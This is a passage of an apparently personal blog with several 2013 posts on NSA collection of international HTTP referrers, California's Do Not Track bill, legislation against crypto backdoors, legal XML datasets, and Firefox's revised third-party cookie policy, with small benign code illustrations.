There is a strong argument that the answer to both questions is no.⁸ The NSA’s purported statutory authority for Internet surveillance within the U.S. expressly prohibits snooping on domestic communications where “all intended recipients” are also domestic. And both the courts and Congress have rightly recognized that an intercept of Internet content entirely within the United States, much like a telephone wiretap, requires a warrant and probable cause. Even the questionably effective Foreign Intelligence Surveillance Court has required the NSA to ditch purely domestic communications.

For whatever FISC oversight is worth, perhaps the NSA has provided (secret) briefing on international referrers. Perhaps a judge has (secretly) approved. There is, however, cause for doubt.

In 2011, the NSA alerted its judicial overseers to a different technical glitch. When email and other messages transit the Internet, they can get bundled together. If the NSA intercepts an international note, it might also snag purely domestic messages in the same bunch. A FISC judge lambasted the NSA for yet another “substantial misrepresentation” about its mass surveillance and held the program unconstitutional. So, this would hardly be the NSA’s first omission gaffe.

Even if the international referrer issue has been rigorously reviewed, there are myriad other ways that Americans might unknowingly send data overseas. Domestic organizations often place servers outside the United States. A tiny part of the Chevrolet website, for example, resides in Frankfurt, Germany.¹⁰ What’s more, even if a user and server are both stateside, the path connecting them might wander into Canada or Mexico. A domestic cloud business might shuffle data to or from a data center overseas. And many of the online services that Americans use are not obviously international. The popular scheduling website Doodle? Swiss. The music streaming service Spotify? Swedish. The dating website Plenty of Fish? Canadian. The popular link shortener is.gd, used by @Bruce_Schneier¹¹ for blog updates lambasting the NSA? British.

It is difficult to believe that the NSA’s independent supervisors have the technical savvy to consistently identify, assess, and remediate these sorts of problems. The FISC has itself vented frustration about having to accept the agency’s technical claims at face value.

Even if intelligence oversight were adequate, problems like these would nevertheless recur. The Internet is not balkanized along geopolitical boundaries. Communications are not neatly labeled by nationality and locale. Online systems routinely repackage and reroute activity in convoluted ways. Attempts at singling out Americans will necessarily rely on patchy guesswork. And they will necessarily get it wrong, a lot.

Many thanks to the friends and colleagues at Stanford, Princeton, and elsewhere who provided feedback on this work. All views and errors are solely my own.

This research was the basis for a submission to the Review Group on Intelligence and Communications Technologies within the Office of the Director of National Intelligence.

1. Leaked slides on XKeyscore suggest NSA mass metadata collection includes HTTP headers, and according to the Guardian, a guide on Marina indicates that the program “tracks a user’s browser experience.”

2. I used the Internet Archive’s Wayback Machine to estimate the period during which the House website hosted a Texthelp script. At the time of writing, the script remains on House webpages, but is commented out.

3. Oddly, www.house.gov is hosted by Akamai, while house.gov appears to be hosted from a federal datacenter near Philadelphia.

4. Specifically, the House website included the following in its standard template:

The Texthelp BrowseAloud script, in turn, triggered an HTTP request to babm.texthelp.com.

var $bajq, browsealoud = {
    BASE_ADDRESS: "babm.texthelp.com",
    . . .
    init: function () {
      . . .
      var d;
      try {
        if (window.XDomainRequest) {
          d = new XDomainRequest()
        } else {
          d = new XMLHttpRequest()
        }
        d.open("GET", (this.isSecure ? "https" : "http") + "://" + this.BASE_ADDRESS + "/Detect.ashx", false);
        d.send(null)
      } catch (s) {
        this.debug("ERROR: init: " + s)
      }
      if (d.responseText !== "") {
        this.localeId = d.responseText
      }
      . . .
    },
    . . .
};
document.write(browsealoud.init());

5. A corollary concern, which I do not address here, is that an Internet user outside the United States may access a website that is also outside the United States, but includes American third-party content. Many of the largest third parties are based in the United States, so this phenomenon is quite likely pervasive. Researchers at the University of Toronto have documented the related concern of network paths that happen to pass through the United States.

6. I cannot, of course, say how often NSA analysts inspect international referrers from domestic websites—leaks have not (yet?) provided such granular detail. As privacy scholars have pointed out time and again, though, concerns arise from the moment of data collection—not just when data is used. One particular source of concern is insider misbehavior, which the NSA has hardly proven immune to.

7. The crawler visited the Quantcast U.S. top 2,500 websites, following five links from each landing page. It spent fifteen seconds on each page so that dynamic content could load. After the crawl finished, I searched HTTP Request-URI and Referer headers for leakage of the URLs of pages visited during the crawl. Next, I used the MaxMind GeoLite Country database to spot receiving servers possibly located outside the United States. I finally confirmed servers were international by running the traceroute utility and manually inspecting its output. All Internet access was through the Stanford University network.
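The matching step described in this footnote can be sketched roughly as follows. This is not FourthParty code. The function name, the record fields (`url`, `referer`), the `.example` hosts, and the toy country table are all hypothetical stand-ins, with the table playing the role of a GeoLite-style lookup. The sketch also leaves out the traceroute confirmation, so its output should be read as "possibly international" candidates only.

```javascript
// Hypothetical sketch of the post-crawl analysis: find logged requests that
// reveal a visited page URL (in the Referer header or inside the request URI)
// to a server that a country lookup places outside the United States.
function findInternationalLeaks(visitedPages, requests, countryOfHost) {
  const leaks = [];
  for (const req of requests) {
    const receivingHost = new URL(req.url).hostname;
    const country = countryOfHost(receivingHost);
    if (!country || country === "US") continue; // unknown or domestic server

    for (const page of visitedPages) {
      // Skip first-party requests back to the visited page's own host.
      if (new URL(page).hostname === receivingHost) continue;

      const viaReferer = req.referer === page;
      const viaUri =
        req.url.includes(page) || req.url.includes(encodeURIComponent(page));
      if (viaReferer || viaUri) {
        leaks.push({
          page,
          receivingHost,
          country,
          via: viaReferer ? "referer" : "request-uri",
        });
      }
    }
  }
  return leaks;
}

// Made-up crawl log for illustration only.
const crawlPages = ["http://news.example/story"];
const crawlRequests = [
  { url: "http://widgets.example/detect", referer: "http://news.example/story" },
  { url: "http://cdn.example/style.css", referer: "http://news.example/story" },
  { url: "http://pixel.example/p?u=" + encodeURIComponent("http://news.example/story") },
];
// Made-up country table standing in for a GeoIP database lookup.
const toyCountries = {
  "widgets.example": "GB",
  "cdn.example": "US",
  "pixel.example": "CA",
};
const crawlLeaks = findInternationalLeaks(
  crawlPages,
  crawlRequests,
  (host) => toyCountries[host]
);
console.log(crawlLeaks);
```

Treating unknown locations as non-leaks keeps the sketch conservative. A real analysis would want to review those hosts by hand instead of silently dropping them.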

8. Since the focus of this already-lengthy post is technology and policy concerns, I do not provide a detailed treatment of legal considerations. Related issues include the location of acquisition, the scope of Executive Order 12333 and Article II authority, the extent of Fourth Amendment protection in HTTP headers, whether statutory and constitutional protections encompass international referrers as domestic, quasi-domestic, or one-end-foreign communications, whether acquisition of international referrers is permissible as incidental to lawful acquisition, and whether statutory and constitutional protections are triggered at the time of acquisition or only when used in intelligence analysis.

9. To the extent Internet traffic acquisition occurs outside the U.S., the administration appears not even to brief the FISC, nor to provide unprompted briefing to Congress.

10. The chevrolet.com server appears to be located in Frankfurt. If you load chevrolet.com in your browser, you will then be redirected to www.chevrolet.com, which is hosted domestically by Akamai.

11. I have no idea if this account is actually operated by Bruce Schneier, though that’s beside the point. Many users clicking on links critical of the NSA may be, ironically, tipping off the NSA.

Do Not Track in California

jonathan — Tue, 10 Sep 2013 15:40:43 +0000

Both houses of the California legislature have unanimously approved AB 370, a Do Not Track initiative that is backed by Attorney General Harris. If Governor Brown signs the bill, it will be the first Do Not Track law worldwide. So, what would it do? More and less than a casual reader might expect.

The California Online Privacy Protection Act

To understand AB 370, you have to understand the California Online Privacy Protection Act (“CalOPPA”). The law was enacted in 2003, with the primary aim of requiring privacy policies on consumer websites. For the most part, CalOPPA has succeeded: Popular websites have largely come into compliance. Applications of the law have been generally unambiguous and uncontroversial.¹

Unfortunately, CalOPPA shows its age. First, the law’s requirements are cabined to categories of personally identifiable information, a legal convenience that has been outmoded by advances in computer science. Research has time and again shown that information may be trivially identifiable, even though it doesn’t include obvious identifying information like a name or address. Second, CalOPPA’s phrasing makes sense for a conventional website where a user opens an account. But what about the ecosystem of third-party websites that users have never heard of and never log into? These limitations may prove fatal to AB 370’s legislative policy.

Do Not Track Transparency

AB 370 aims to bring transparency to online tracking. The notion is that if a company is in the business of tracking users, it’ll have to disclose how it treats the Do Not Track setting in popular browsers.² Good idea, but not so good legislative drafting.
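For readers unfamiliar with the mechanics: when the Do Not Track setting is on, the browser adds a `DNT: 1` header to its HTTP requests. The sketch below shows how a server might detect that signal. The function names and the example policy are hypothetical, and nothing in AB 370 requires this or any other particular response; the bill only asks a covered business to disclose what it does.

```javascript
// Returns true when the request headers carry the Do Not Track signal "DNT: 1".
// Header names are matched case-insensitively.
function hasDoNotTrack(headers) {
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() === "dnt") return String(value).trim() === "1";
  }
  return false;
}

// Hypothetical policy, for illustration only: skip the tracking cookie when
// the signal is present. A real service could respond differently, which is
// the behavior a disclosure would describe.
function chooseResponse(headers) {
  return { setTrackingCookie: !hasDoNotTrack(headers) };
}

console.log(chooseResponse({ Host: "tracker.example", DNT: "1" }));
console.log(chooseResponse({ Host: "tracker.example" }));
```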

AB 370 bolts Do Not Track onto CalOPPA. The trouble is, CalOPPA and Do Not Track come from different eras. CalOPPA is written in the language of personally identifiable information and first-party websites. Do Not Track is designed to address re-identifiable information and third-party websites.

The result is a serious statutory interpretation question.³ Trackers have a number of possible grounds for claiming they are exempt from CalOPPA and AB 370, such as:

Because we’re third parties, consumers don’t “use or visit” our services.
The information that we collect is not “about” an “individual consumer,” but rather, related to a browser or device.
Our data isn’t “personally identifiable information,” it’s just browsing activity and web protocol logs.⁴
To the extent there is any personally identifiable information that flows to us, we don’t “collect” it because we don’t actually use it for our business.
Similarly, any personally identifiable information that we possess exists in logs that aren’t “maintained . . . in an accessible form.”

So, are third-party web and mobile trackers actually covered by the bill? Unclear.

A tracker’s obligations under AB 370 are also ambiguous. If a service is covered, it has to explain how it “responds to Web browser ‘do not track signals’ or other mechanisms” for consumer choice. What about Do Not Track implementations that aren’t in a conventional “Web browser,” such as Firefox OS? If a tracker offers a self-regulatory mechanism for consumer choice, does the “or” exempt it from describing its treatment of Do Not Track? Again, unclear.

In sum, trackers appear to have non-frivolous legal arguments that they fall outside CalOPPA and AB 370. And if they are covered, they have non-frivolous legal arguments that existing self-regulatory practices are enough.

Do Not Track Substance

Proponents of AB 370 emphasize that it is a Do Not Track transparency bill, not a substantive Do Not Track bill. That’s true in one sense: the bill doesn’t compel any business to support Do Not Track. It’s not true in another sense, though: the bill sneaks in a definition of Do Not Track.⁵

For over two years, privacy advocates and technology companies have haggled over how to define Do Not Track in the World Wide Web Consortium. (I recently resigned from the group owing to its stagnation.) AB 370 sidesteps those efforts and applies its own definition: a business is covered if it collects information about “online activities over time and across third-party . . . online services.” The definition is vague, to be sure, and would need clarification through policy statements, enforcement, and adjudication. But, crucially, the definition is a matter of California law. It does not depend on the W3C’s efforts.

Concluding Thoughts

AB 370 reflects political savvy by the Attorney General and her team. The bill advances Do Not Track in a way that is difficult to oppose—who’s against transparency?—and it lays a foundation for future CalOPPA and Do Not Track initiatives. Moreover, though the bill’s drafting opens it to interpretive challenges, the AG is well-positioned to respond: She would be seeking a legislative quick fix to restore the law’s intent, not an unprecedented foray into contested Do Not Track territory.

A close reading of AB 370 may also explain tame industry resistance. Remarkably, legislative reports reflect limited formal opposition. If trade groups and leading companies believe they can effectively nullify the bill’s impact in the courts, they may feel less impetus to expend political capital on obstruction in the legislature. If accurate, this view would reflect a strategic forecasting disconnect between the Attorney General and commercial stakeholders.

Enough about motives and strategy. This much is certain: If AB 370 becomes law, stay tuned for future tussles over what the legislation means and how it might be revised or expanded. Do Not Track in California is just getting started.

This bill is sponsored by the California Attorney General’s Office. I previously collaborated with Cal DOJ on online privacy issues, but not this particular bill.

I am not a lawyer. This is not legal advice.

1. There has been one substantial controversy about CalOPPA’s coverage formula. In February 2012, Attorney General Harris announced that she interprets “online service” to encompass mobile apps. The major mobile platforms acquiesced, and the interpretation has not been challenged in court.

2. Another provision of AB 370 aims to increase transparency by compelling first parties to provide disclosures about third-party tracking.

Disclose whether other parties may collect personally identifiable information about an individual consumer’s online activities over time and across different Web sites when a consumer uses the operator’s Web site or service.

This mandate does not, however, require identifying particular practices or third parties. The likely effect will be boilerplate notices of limited utility, to the effect of: “Some third parties may track our users.” The provision may also be open to a CDA 230 preemption argument.

3. This post focuses on statutory interpretation challenges to AB 370. The bill may be vulnerable to other attacks, such as federal statutory preemption or unconstitutionality. According to legislative reports, critics of AB 370 have emphasized narrow statutory interpretation in their discussion of the bill.

4. One category of “personally identifiable information” is:

Any other identifier that permits the physical or online contacting of a specific individual.

A Senate Judiciary report suggests that this provision is broad enough to encompass tracking. (Strangely, the discussion appears to conflate the scope of “personally identifiable information” with the scope of “collection.”)

“[Critics] offer an interpretation of the definition of “personally identifiable information” that only includes information actively or knowingly provided by a Web user, which, by implication, would not include the passive collection of information via online tracking addressed in this bill. Such an interpretation of existing law needlessly restricts the definition of “personally identifiable information” to the active (and by implication voluntary or consensual) transmission of information, overlooking the fact that subsection (a)(6) of the definition sweeps in “[a]ny other identifier that permits the physical or online contacting of a specific individual,” including information passively collected from an individual.”

The Attorney General also indicates in a mobile privacy report that “personally identifiable information” includes unique identifiers used in tracking.

5. Earlier versions of the bill, in fact, expressly defined the term “online tracking.”

Legislating NSA Crypto Circumvention

jonathan — Sat, 07 Sep 2013 14:30:56 +0000

The National Security Agency works to circumvent cryptography. In the abstract, that’s hardly objectionable—legitimate intelligence targets may adopt security measures. Concerns arise, however, when the NSA subverts the technologies that ordinary consumers and businesses rely upon. Longstanding conventional wisdom in the computer security community has been that the NSA works to insert backdoors into crypto standards and security products, and that the agency hoards vulnerabilities in popular crypto algorithms and implementations. Widely read reports recently confirmed these views.

The go-to recommendation among many security experts has been deployment of additional protective measures. That’s an appealing near-term option for sophisticated users and companies. It’s largely impractical for ordinary users, however. And adding more crypto won’t restore damaged trust, shut potentially risky backdoors, or patch vulnerable systems.

The law offers several possible long-term directions for reform. Consider the following example legislative proposals.

No crypto math backdoors. Prohibit misrepresentation of the security properties of a cryptographic algorithm or protocol that is undergoing NIST standardization.¹

No compelled implementation backdoors. At present, there is ambiguity surrounding legal authority to compel a backdoor in a security system. Clarify that providers of secure hardware and software are not required to facilitate government access.²

No sneaking in wide-scale implementation backdoors. Prohibit inserting or suggesting surreptitious weaknesses in popular security technologies. For example, the NSA would be barred from introducing an exploitable flaw into OpenSSL.

Responsible vulnerability disclosure. Require the NSA to publicize vulnerabilities in security systems that are widely used by consumers and businesses. Details and timing of disclosure might vary by context-specific factors such as severity, likelihood of discovery by others, sensitivity of means of discovery, and immediate operational necessity.

Let me again emphasize, these are examples. There are many possible drawbacks and there is much room for improvement. I suggest them merely as a starting point: technology experts could, working with Congress, improve trust and reduce risk in secure systems. Deploying new security technology is an understandable first step. For a long-term fix, though, the security community should think carefully about law.

1. See 15 U.S.C. § 278g-3 for the basic legal framework of NIST computer security standards.

2. The Communications Assistance for Law Enforcement Act (CALEA) provides a possible starting point. Under 47 U.S.C. § 1002(b)(3): “A telecommunications carrier shall not be responsible for decrypting, or ensuring the government’s ability to decrypt, any communication encrypted by a subscriber or customer, unless the encryption was provided by the carrier and the carrier possesses the information necessary to decrypt the communication.”

Update: Representative Rush Holt (D-NJ 12) is calling for a legislative response. The current draft of Holt’s proposal, H.R. 2818, addresses compelled backdoors.

Advancing Empirical Legal Scholarship: Federal Trial Opinions and Rules

jonathan — Sat, 10 Aug 2013 00:03:38 +0000

In earlier posts I have shared XML versions of certain legal materials, including federal statutes, appellate opinions, and appellate rules. My aim has been to assist empirical legal scholars by providing machine-readable government documents.

Additional legal materials accompany this post, including federal trial-level opinions and rules. Suggestions from the research community remain very much welcome.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.
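As a rough sketch of what a properly configured request might look like: Amazon S3 expects a requester pays download to be authenticated and to explicitly acknowledge the charge, which boto3 exposes as the `RequestPayer` parameter. The bucket and key names below are placeholders that I made up for illustration, not the actual locations of these files.

```python
def requester_pays_args(bucket: str, key: str) -> dict:
    """Build keyword arguments for an S3 GetObject call on a requester pays bucket."""
    return {
        "Bucket": bucket,
        "Key": key,
        # Acknowledges that the requester, not the bucket owner, pays for the transfer.
        "RequestPayer": "requester",
    }


# Placeholder names: substitute the real bucket and key for the file you want.
args = requester_pays_args("example-legal-data", "constitution.zip")

# With boto3 installed and AWS credentials configured, the download would be:
#   import boto3
#   response = boto3.client("s3").get_object(**args)
```

An anonymous request, or one that omits the acknowledgement, is the likely cause of the “Access Denied” error.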

Constitution of the United States: ZIP (46 KB)
Federal Rules of Bankruptcy Procedure: ZIP (242 KB)
Federal Rules of Civil Procedure: ZIP (184 KB)
Federal Rules of Criminal Procedure: ZIP (92 KB)
Federal Rules of Evidence: ZIP (55 KB)
Federal Sentencing Guidelines: ZIP (2 MB)
Internal Revenue Service Revenue Rulings: ZIP (3 MB)
Rules of the Supreme Court of the United States: ZIP (61 KB)
Trademark Trial and Appeal Board Opinions: ZIP (62 MB)
United States Bankruptcy Court Opinions: ZIP (690 MB)
United States District Court Opinions: ZIP (6 GB)
Rules of the Judicial Panel on Multidistrict Litigation: ZIP (30 KB)
United States Tax Court Opinions: ZIP (124 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

Next Steps for the Firefox Cookie Policy

jonathan — Tue, 21 May 2013 14:45:41 +0000

Consumers neither expect nor approve of web tracking.¹ Mozilla has been a frequent advocate for its users, advancing technologies that signal preferences (Do Not Track), lend transparency (Collusion), and facilitate privacy-friendly web services (Persona and Social API). Last fall, the Mozilla community began a concerted effort in a new direction: technical countermeasures against tracking.² One of our first projects has been a revision of the Firefox cookie policy.³

Cookie policies are inherently imprecise. Some unwanted tracking cookies might slip through, compromising user privacy (“underblocking”). And some non-tracking cookies might get blocked, breaking the web experience (“overblocking”). The challenge in designing a cookie policy is calibrating the tradeoff between underblocking and overblocking.⁴
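To make the two error types concrete, here is a minimal sketch of how they could be measured, assuming a sample of cookies that someone has already labeled as tracking or non-tracking. The function name and the sample data are hypothetical.

```python
def blocking_rates(observations):
    """Return (underblocking_rate, overblocking_rate).

    Each observation is an (is_tracking, was_blocked) pair of booleans.
    """
    tracking = [blocked for is_tracking, blocked in observations if is_tracking]
    benign = [blocked for is_tracking, blocked in observations if not is_tracking]
    # Underblocking: tracking cookies that were allowed through.
    under = tracking.count(False) / len(tracking) if tracking else 0.0
    # Overblocking: non-tracking cookies that were blocked.
    over = benign.count(True) / len(benign) if benign else 0.0
    return under, over


# Hypothetical labeled sample: four tracking cookies, four non-tracking cookies.
sample = [
    (True, True), (True, True), (True, True), (True, False),
    (False, False), (False, False), (False, False), (False, True),
]
under, over = blocking_rates(sample)
```

In this made-up sample, one tracking cookie in four slips through and one non-tracking cookie in four is blocked.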

The patch that I developed is an intentionally cautious first step: it aims to substantially reduce underblocking with little (if any) overblocking. The revised policy is so cautious, it isn’t even new: it’s drawn directly from Safari.⁵ Almost every iPhone, iPad, and iPod Touch user is already running the revised Firefox cookie policy. Web engineers are already familiar with designing to accommodate the policy. The notion is simple: start by raising Firefox to the present best practice among competing browsers, then iteratively innovate improvements.

Firefox’s revised cookie policy landed in the pre-alpha build in late February. Since then, Mozillians and I have carefully monitored bug reports. It appears that we achieved our aim: there are only two confirmations of inadvertent breakage.⁶ We did not hear any novel concerns when the patch advanced to alpha in early April. This past week, Mozilla’s CTO requested a hold on the revised policy for an extra release cycle to measure its performance. At the same time, he reaffirmed that Mozilla is “committed to user privacy” and “committed to shipping a version of the patch that is ‘on’ by default.”

I agree that we should be quantitatively rigorous in our approach to iterating the Firefox cookie policy. An extra six-week release cycle will allow us to further validate our hypothesis that the patch delivers improved privacy without breakage,⁷ as well as lay the groundwork for future updates. Going forward, our challenge will be to understand and improve the underblocking and overblocking properties of the Firefox cookie policy.

Underblocking and Overblocking

There are at least three substantial areas of underblocking that we know we need to address with future improvements.

Old cookies. The revised policy does not limit preexisting tracking cookies. Firefox users who update to the revised policy will not fully benefit until they clear their cookies.
Temporary visits. Sometimes a user temporarily visits a tracking website, such as after clicking an advertisement (intentionally or inadvertently). The revised policy indefinitely allows tracking cookies from a website after just one temporary visit.
Dual-use domains. Several popular websites use the same domain for both consumer services and tracking. Yahoo!, for example, operates both its homepage and advertisement tracking from yahoo.com. If a user visits the Yahoo! homepage, the company will be able to track the user across other websites. Google, on the other hand, largely hosts search on google.com but advertising tracking on doubleclick.net. If a user runs a query with Google, they will still be protected against Google ad tracking.
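The three cases above can be walked through with a toy model of the revised policy. This is a sketch under simplifying assumptions, not the Firefox implementation: it treats every first-party visit as setting a cookie, it keys on bare domain names, and `tracker.example` and `adnetwork.example` are hypothetical.

```python
class RevisedPolicyModel:
    """Toy model: third-party cookies are allowed only for domains that already hold a cookie."""

    def __init__(self, preexisting=()):
        # Domains that already have at least one cookie stored.
        self.domains_with_cookies = set(preexisting)

    def visit(self, domain):
        """A first-party visit, assumed here to always result in a stored cookie."""
        self.domains_with_cookies.add(domain)

    def third_party_allowed(self, domain):
        """Can embedded content from this domain use cookies on another site?"""
        return domain in self.domains_with_cookies


# Old cookies: a tracker's cookie set before the update keeps working.
upgraded = RevisedPolicyModel(preexisting={"tracker.example"})
old_cookie_tracks = upgraded.third_party_allowed("tracker.example")

fresh = RevisedPolicyModel()
# Temporary visits: one ad click is enough to enable tracking afterwards.
fresh.visit("adnetwork.example")
temporary_visit_tracks = fresh.third_party_allowed("adnetwork.example")

# Dual-use domains: visiting yahoo.com enables yahoo.com as a third party,
# while visiting google.com does not enable doubleclick.net.
fresh.visit("yahoo.com")
fresh.visit("google.com")
yahoo_tracks = fresh.third_party_allowed("yahoo.com")
doubleclick_tracks = fresh.third_party_allowed("doubleclick.net")
```

In this model the first three checks come out allowed and only the `doubleclick.net` check is blocked, which matches the underblocking described in the list.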

As for overblocking, again, I am not aware of any significant shortcomings with the revised cookie policy.⁸

Next Steps

We have a number of tools at our disposal for improving our understanding of the Firefox cookie policy, including feedback solicitations, user surveys, browser measurements, web crawls, and much more. There are many possible directions for product innovation, including heuristics, machine learning, community reporting, manually-curated lists, mechanisms for confirming user preferences, new user interfaces, new APIs, and new institutions.

I look forward to continuing collaboration with Mozilla and its community on web privacy and security. I’m excited to get the revised cookie policy into users’ hands. And I’m even more excited about building what comes next.

All views, errors, and omissions are solely my own. I do not speak for Mozilla or the Mozilla community.

1. See the survey paper Third-Party Web Tracking: Policy and Technology for background. In the context of this post, “tracking” means the collection of a user’s browsing history by a third-party website.

2. For an overview of Mozilla’s open-source community model, see MozillaWiki » Community and Mozilla.org » Governance. Many members of the Mozilla community have now contributed to the tracking countermeasures effort.

3. Apple and Microsoft have both automatically limited tracking cookies for a decade. There was an effort to block tracking cookies by default in Firefox three years ago, but it was withdrawn under contested circumstances (1, 2, 3, 4).

4. Other considerations could include types of underblocking and overblocking, as well as possible reactions to the policy. Future posts might address these topics, depending on reader interest.

5. In the interest of precision: the revised Firefox cookie policy is slightly more permissive than the Safari policy owing to implementation specifics. Additional details are in an earlier post.

6. The sites are dayonecenter.com (Alexa rank > 1M) and western.org (Alexa rank ≈ 200K).

7. As I understand our release conditions, the patch will move forward unless there’s confirmed breakage, the breakage is so substantial as to outweigh longstanding user demand for privacy, and the breakage cannot be ameliorated through outreach, mitigation measures, or rapid iteration. Under present circumstances, the patch plainly satisfies these release conditions.

8. Relatedly, we may wish to take steps to accommodate websites (if any) that have a third-party domain, do not compromise consumer privacy, do not break the consumer web experience without cookies, cannot deploy an accommodation for the revised cookie policy, require cookies for functionality, and have lost that functionality on account of the revised policy.

Advancing Empirical Legal Scholarship: Federal Appellate Opinions and Rules

jonathan — Sat, 04 May 2013 00:00:57 +0000

Last December I shared XML versions of the U.S. Code and Supreme Court opinions through early 2012. My intent was and remains to facilitate empirical legal scholarship by providing government-authored materials in a machine-readable format.

This post is accompanied by additional documents: opinions and rules of various federal appellate tribunals. As before, I welcome feedback from the academic research community.

Update January 13, 2014: The data is now hosted on Amazon S3 in a requester pays bucket. If you have not properly configured your request, you will receive an “Access Denied” error.

United States Court of Appeals for the First Circuit Opinions: ZIP (152 MB)
United States Court of Appeals for the Second Circuit Opinions: ZIP (311 MB)
United States Court of Appeals for the Third Circuit Opinions: ZIP (239 MB)
United States Court of Appeals for the Fourth Circuit Opinions: ZIP (190 MB)
United States Court of Appeals for the Fifth Circuit Opinions: ZIP (409 MB)
United States Court of Appeals for the Sixth Circuit Opinions: ZIP (244 MB)
United States Court of Appeals for the Seventh Circuit Opinions: ZIP (305 MB)
United States Court of Appeals for the Eighth Circuit Opinions: ZIP (263 MB)
United States Court of Appeals for the Ninth Circuit Opinions: ZIP (442 MB)
United States Court of Appeals for the Tenth Circuit Opinions: ZIP (211 MB)
United States Court of Appeals for the Eleventh Circuit Opinions: ZIP (180 MB)
United States Court of Appeals for the District of Columbia Circuit Opinions: ZIP (209 MB)
United States Court of Appeals for the Federal Circuit Opinions: ZIP (164 MB)

Federal Rules of Appellate Procedure: ZIP (82 KB)
First Circuit Bankruptcy Appellate Rules: ZIP (37 KB)
Sixth Circuit Bankruptcy Appellate Rules: ZIP (29 KB)
Eighth Circuit Bankruptcy Appellate Rules: ZIP (37 KB)
Ninth Circuit Bankruptcy Appellate Rules: ZIP (86 KB)
Tenth Circuit Bankruptcy Appellate Rules: ZIP (37 KB)

United States Board of Immigration Appeals Opinions: ZIP (21 MB)

Please note, this is a personal project. It is not related to my coursework or research at Stanford University.

The New Firefox Cookie Policy

jonathan — Fri, 22 Feb 2013 17:56:36 +0000

The default Firefox cookie policy will, beginning with release 22, more closely reflect user privacy preferences. This mini-FAQ addresses some of the questions that I’ve received from Mozillians, web developers, and users.

How does the new Firefox cookie policy work?

Roughly: Only websites that you actually visit can use cookies to track you across the web.

More precisely: If content has a first-party origin,¹ nothing changes. Content from a third-party origin only has cookie permissions if its origin already has at least one cookie set.
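For readers who prefer code, the rule might be sketched roughly as follows. This is an illustration rather than the actual patch: the function names are my own, and the tiny `PUBLIC_SUFFIXES` set is a stand-in for the full Public Suffix List that a real implementation would consult.

```python
# Tiny stand-in for the Public Suffix List; real code would load the full list.
PUBLIC_SUFFIXES = {"com", "org", "net", "co.uk"}


def registrable_domain(host: str) -> str:
    """Return the public suffix plus one label, e.g. 'ads.example.co.uk' -> 'example.co.uk'."""
    labels = host.lower().split(".")
    # Scan from the longest candidate suffix to the shortest.
    for i in range(len(labels)):
        if ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            # Keep one extra label to the left of the matched suffix, if any.
            return ".".join(labels[max(i - 1, 0):])
    # Unknown suffix: fall back to the full host name.
    return host.lower()


def has_cookie_permission(content_host, page_host, origins_with_cookies):
    """First parties are unaffected; third parties need an existing cookie."""
    content_origin = registrable_domain(content_host)
    if content_origin == registrable_domain(page_host):
        return True  # first-party content: nothing changes
    return content_origin in origins_with_cookies


# Hypothetical state: the user has a cookie from example.com and nothing else.
stored = {"example.com"}
first_party = has_cookie_permission("cdn.example.com", "www.example.com", stored)
known_third_party = has_cookie_permission("widgets.example.com", "news.example.org", stored)
unknown_third_party = has_cookie_permission("tracker.example.net", "news.example.org", stored)
```

Only the last check is denied: `tracker.example.net` is a third party on `news.example.org` and has no cookie already set.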

How does Firefox’s new policy compare to the other major browsers?

Chrome – Allows all cookies.

Internet Explorer – Cookie permissions vary by P3P compact policy. In practice, almost all third-party tracking cookies are allowed.²

Safari – First-party content has cookie permissions. Third-party content only has cookie permissions if the content already has at least one cookie set.

In short, the new Firefox policy is a slightly relaxed version of the Safari policy.³

Will the new Firefox policy break websites?

Collateral impact should be limited. Safari’s cookie policy has been in place for over a decade, and it is included in both the desktop and iOS versions of the browser. A few websites may require a tiny code change to accommodate Firefox in the same way as Safari.

Just to be sure, the Mozilla privacy team is closely monitoring the policy before final release. The patch will spend about 6 weeks each in the pre-alpha, alpha, and beta builds. If you spot any oddities, please report them to Mozilla support!

How can I test whether my website has cookie permissions?

Easy: try to set a cookie. This approach lets you build a cookie permission check into both server-side and client-side code.
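On the server side, a minimal sketch of that test could look like the following. It assumes a two-step flow that I am supplying for illustration: send a probe cookie in one response, then look for it in the Cookie header of a later request. The cookie name is hypothetical. Client-side code can do the equivalent by writing to `document.cookie` and reading the value back.

```python
from http.cookies import SimpleCookie

PROBE_NAME = "cookie_probe"  # hypothetical cookie name


def probe_set_cookie_header() -> str:
    """Value for a Set-Cookie response header that attempts to set the probe."""
    cookie = SimpleCookie()
    cookie[PROBE_NAME] = "1"
    cookie[PROBE_NAME]["path"] = "/"
    return cookie[PROBE_NAME].OutputString()


def probe_was_accepted(cookie_header: str) -> bool:
    """Check the Cookie request header of a later request for the probe."""
    received = SimpleCookie()
    received.load(cookie_header or "")
    return PROBE_NAME in received
```

If the probe never comes back, the content does not have cookie permissions, whatever the browser or its settings.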

Browser sniffing is generally disfavored since it can be unreliable and requires updating. Moreover, sniffing will not accommodate Chrome and Internet Explorer users who have switched from the default cookie policy.

I operate a third-party website that uses cookies. What should I do?

If a Firefox user appears to have intentionally interacted with your content, take the same approach as for Safari users.⁴ Examples of content within this category include Facebook apps and comment widgets where a user has typed text.

If a user does not seem to have intentionally interacted with your content, or if you’re uncertain, you should ask for permission before setting cookies. Most analytics services, advertising networks, and unclicked social widgets would come within this category.

In sum, working around the policy’s technical limits may be reasonable in certain cases, but undermining the policy’s privacy purpose is never acceptable.

What happens to preexisting cookies?

The new policy does not make any special provision for preexisting cookies. Current Firefox users should clear their cookies to fully benefit from the new policy.⁵

What comes next for the Firefox cookie policy?

There’s still plenty of work to do. Some possible directions that I’m interested in:

Extending the cookie policy to other storage technologies (e.g. HTML5 Web Storage).
Providing a uniform mechanism for requesting storage permissions.
Relaxing the cookie policy for websites that honor Do Not Track.

Please share your ideas on the mozilla.dev.privacy mailing list!

All views are solely my own. I do not speak for Mozilla.

This was my first contribution to the Firefox codebase. Huge thanks to Sid Stamm, Monica Chew, Brendan Eich, Asa Dotzler, Josh Matthews, Justin Dolske, Daniel Veditz, and many other members of the Mozilla community for their advice, guidance, and tolerance of my inexperience.

1. An origin is determined by public suffix + 1. ↩

2. Many researchers have criticized Microsoft’s approach for being ineffective, convoluted, and relying on the de facto deprecated P3P standard. For background, see Token Attempt: The Misrepresentation of Website Privacy Policies Through the Misuse of P3P Compact Policy Tokens by Leon et al. ↩

3. The difference is primarily owing to engineering convenience. ↩

